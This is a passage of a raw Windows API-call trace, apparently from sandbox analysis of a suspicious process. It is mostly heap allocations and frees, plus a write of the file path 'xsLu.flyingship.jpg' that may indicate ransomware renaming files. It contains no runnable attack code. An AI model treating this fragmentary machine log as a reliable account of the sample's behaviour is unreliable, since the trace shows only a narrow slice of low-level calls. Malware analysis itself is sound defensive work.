SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0191.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.flyingship.jpg\r\n", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0191.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3d) returned 0x8db2e8 [0191.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.flyingship.jpg\r\n", cchWideChar=61, lpMultiByteStr=0x8db2e8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.flyingship.jpg\r\n", lpUsedDefaultChar=0x0) returned 61 [0191.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.801] WriteFile (in: hFile=0x160, lpBuffer=0x8db180*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db180*, lpNumberOfBytesWritten=0x87f43c*=0x3c, lpOverlapped=0x0) returned 1 [0191.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.801] CloseHandle (hObject=0x160) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0191.803] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0191.803] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.804] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.804] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.804] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0191.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0191.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.804] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0191.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd360 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0191.805] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0191.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0191.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0191.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0191.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0191.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0191.809] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: 